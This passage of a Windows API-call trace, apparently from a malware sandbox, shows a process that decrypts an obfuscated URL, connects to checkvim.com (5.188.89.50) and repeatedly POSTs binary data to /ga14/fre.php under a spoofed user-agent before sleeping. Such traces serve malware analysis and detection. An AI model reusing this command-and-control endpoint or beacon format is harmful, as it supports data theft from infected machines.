(lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.591] CryptDestroyKey (hKey=0x87e2f0) returned 1 [0268.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.592] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0268.592] GetProcessHeap () returned 0x840000 [0268.592] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0268.592] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0268.593] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0268.593] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0268.594] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0268.594] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0268.595] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0268.596] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0268.596] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0268.596] GetProcessHeap () returned 0x840000 [0268.596] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0268.596] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0268.597] GetProcessHeap () returned 0x840000 [0268.597] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0268.597] GetProcessHeap () returned 0x840000 [0268.597] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0268.597] GetProcessHeap () returned 0x840000 [0268.597] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0268.597] GetProcessHeap () returned 0x840000 [0268.597] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc20 [0268.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.669] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0268.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.719] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fac8) returned 1 [0268.725] GetProcessHeap () returned 0x840000 [0268.725] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0268.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.726] CryptImportKey (in: hProv=0x86fac8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6b0) returned 1 [0268.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.727] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0268.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.728] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.728] GetProcessHeap () returned 0x840000 [0268.728] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0268.729] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.729] CryptDecrypt (in: hKey=0x87e6b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc20, pdwDataLen=0x19f9a4 | out: pbData=0x87fc20, pdwDataLen=0x19f9a4) returned 1 [0268.733] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.733] CryptDestroyKey (hKey=0x87e6b0) returned 1 [0268.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0268.734] CryptReleaseContext (hProv=0x86fac8, dwFlags=0x0) returned 1 [0268.734] GetProcessHeap () returned 0x840000 [0268.734] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0268.735] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0268.735] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0268.736] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0268.736] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0268.737] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0268.737] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0268.737] GetProcessHeap () returned 0x840000 [0268.737] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0268.740] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0268.768] GetProcessHeap () returned 0x840000 [0268.768] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871be8 [0268.768] socket (af=2, type=1, protocol=6) returned 0x3ec [0268.768] connect (s=0x3ec, name=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0268.838] FreeAddrInfoW (pAddrInfo=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0268.838] GetProcessHeap () returned 0x840000 [0268.838] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0268.838] GetProcessHeap () returned 0x840000 [0268.839] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0268.839] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0268.841] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0268.841] GetProcessHeap () returned 0x840000 [0268.841] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0268.841] GetProcessHeap () returned 0x840000 [0268.841] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0268.841] GetProcessHeap () returned 0x840000 [0268.841] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fdd0 [0268.841] GetProcessHeap () returned 0x840000 [0268.841] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0268.842] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0268.842] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0268.843] GetProcessHeap () returned 0x840000 [0268.843] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0268.843] GetProcessHeap () returned 0x840000 [0268.843] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0268.843] send (s=0x3ec, buf=0x873a58*, len=237, flags=0) returned 237 [0268.843] send (s=0x3ec, buf=0x87eb58*, len=159, flags=0) returned 159 [0268.843] GetProcessHeap () returned 0x840000 [0268.843] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0268.843] recv (in: s=0x3ec, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0269.200] GetProcessHeap () returned 0x840000 [0269.200] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0269.200] GetProcessHeap () returned 0x840000 [0269.200] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0269.200] GetProcessHeap () returned 0x840000 [0269.200] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0269.200] GetProcessHeap () returned 0x840000 [0269.200] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0269.200] closesocket (s=0x3ec) returned 0 [0269.201] GetProcessHeap () returned 0x840000 [0269.201] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871be8 | out: hHeap=0x840000) returned 1 [0269.201] GetProcessHeap () returned 0x840000 [0269.201] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0269.201] GetProcessHeap () returned 0x840000 [0269.201] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0269.201] GetProcessHeap () returned 0x840000 [0269.201] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0269.201] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1210) returned 0x3ec [0269.208] Sleep (dwMilliseconds=0xea60) [0269.244] GetProcessHeap () returned 0x840000 [0269.244] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa28 [0269.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.246] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0269.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.255] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0269.275] GetProcessHeap () returned 0x840000 [0269.275] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0269.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.278] CryptImportKey (in: hProv=0x86fa40, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e8f0) returned 1 [0269.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.280] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0269.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.281] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.281] GetProcessHeap () returned 0x840000 [0269.281] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0269.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.282] CryptDecrypt (in: hKey=0x87e8f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa28, pdwDataLen=0x19f9a4 | out: pbData=0x87fa28, pdwDataLen=0x19f9a4) returned 1 [0269.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.283] CryptDestroyKey (hKey=0x87e8f0) returned 1 [0269.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.284] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0269.284] GetProcessHeap () returned 0x840000 [0269.284] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0269.285] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0269.285] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0269.286] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0269.287] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0269.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0269.288] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0269.289] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0269.289] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0269.289] GetProcessHeap () returned 0x840000 [0269.289] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8712e0 [0269.289] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0269.290] GetProcessHeap () returned 0x840000 [0269.290] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8712e0 | out: hHeap=0x840000) returned 1 [0269.290] GetProcessHeap () returned 0x840000 [0269.290] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0269.290] GetProcessHeap () returned 0x840000 [0269.290] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0269.290] GetProcessHeap () returned 0x840000 [0269.290] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc20 [0269.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.291] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0269.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.298] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0269.306] GetProcessHeap () returned 0x840000 [0269.306] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0269.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.307] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e470) returned 1 [0269.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.308] CryptSetKeyParam (hKey=0x87e470, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0269.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.309] CryptSetKeyParam (hKey=0x87e470, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.310] GetProcessHeap () returned 0x840000 [0269.310] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0269.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.310] CryptDecrypt (in: hKey=0x87e470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc20, pdwDataLen=0x19f9a4 | out: pbData=0x87fc20, pdwDataLen=0x19f9a4) returned 1 [0269.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.311] CryptDestroyKey (hKey=0x87e470) returned 1 [0269.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.312] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0269.313] GetProcessHeap () returned 0x840000 [0269.313] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0269.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0269.314] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0269.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0269.315] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0269.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0269.316] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0269.316] GetProcessHeap () returned 0x840000 [0269.316] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8714e8 [0269.316] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0269.318] GetProcessHeap () returned 0x840000 [0269.318] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c78 [0269.318] socket (af=2, type=1, protocol=6) returned 0x3f0 [0269.319] connect (s=0x3f0, name=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0269.387] FreeAddrInfoW (pAddrInfo=0x8713f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0269.387] GetProcessHeap () returned 0x840000 [0269.388] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0269.388] GetProcessHeap () returned 0x840000 [0269.388] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0269.388] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0269.389] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0269.390] GetProcessHeap () returned 0x840000 [0269.390] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0269.390] GetProcessHeap () returned 0x840000 [0269.390] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0269.390] GetProcessHeap () returned 0x840000 [0269.390] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fcb0 [0269.390] GetProcessHeap () returned 0x840000 [0269.390] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0269.391] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0269.392] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0269.392] GetProcessHeap () returned 0x840000 [0269.392] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0269.392] GetProcessHeap () returned 0x840000 [0269.392] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0269.392] send (s=0x3f0, buf=0x873a58*, len=237, flags=0) returned 237 [0269.392] send (s=0x3f0, buf=0x87eb58*, len=159, flags=0) returned 159 [0269.393] GetProcessHeap () returned 0x840000 [0269.393] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0269.393] recv (in: s=0x3f0, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0269.759] GetProcessHeap () returned 0x840000 [0269.759] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0269.759] GetProcessHeap () returned 0x840000 [0269.759] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcb0 | out: hHeap=0x840000) returned 1 [0269.759] GetProcessHeap () returned 0x840000 [0269.759] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0269.759] GetProcessHeap () returned 0x840000 [0269.759] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0269.759] closesocket (s=0x3f0) returned 0 [0269.760] GetProcessHeap () returned 0x840000 [0269.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c78 | out: hHeap=0x840000) returned 1 [0269.760] GetProcessHeap () returned 0x840000 [0269.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0269.760] GetProcessHeap () returned 0x840000 [0269.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0269.760] GetProcessHeap () returned 0x840000 [0269.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8714e8 | out: hHeap=0x840000) returned 1 [0269.760] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x11dc) returned 0x3f0 [0269.763] Sleep (dwMilliseconds=0xea60) [0269.764] GetProcessHeap () returned 0x840000 [0269.764] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f950 [0269.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.766] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0269.830] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.831] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f8a8) returned 1 [0269.843] GetProcessHeap () returned 0x840000 [0269.843] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0269.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.844] CryptImportKey (in: hProv=0x86f8a8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e970) returned 1 [0269.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.845] CryptSetKeyParam (hKey=0x87e970, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0269.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.849] CryptSetKeyParam (hKey=0x87e970, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.849] GetProcessHeap () returned 0x840000 [0269.849] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0269.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.853] CryptDecrypt (in: hKey=0x87e970, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f950, pdwDataLen=0x19f9a4 | out: pbData=0x87f950, pdwDataLen=0x19f9a4) returned 1 [0269.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.854] CryptDestroyKey (hKey=0x87e970) returned 1 [0269.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.855] CryptReleaseContext (hProv=0x86f8a8, dwFlags=0x0) returned 1 [0269.855] GetProcessHeap () returned 0x840000 [0269.855] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0269.856] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0269.856] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0269.857] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0269.857] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0269.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0269.858] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0269.859] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0269.859] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0269.859] GetProcessHeap () returned 0x840000 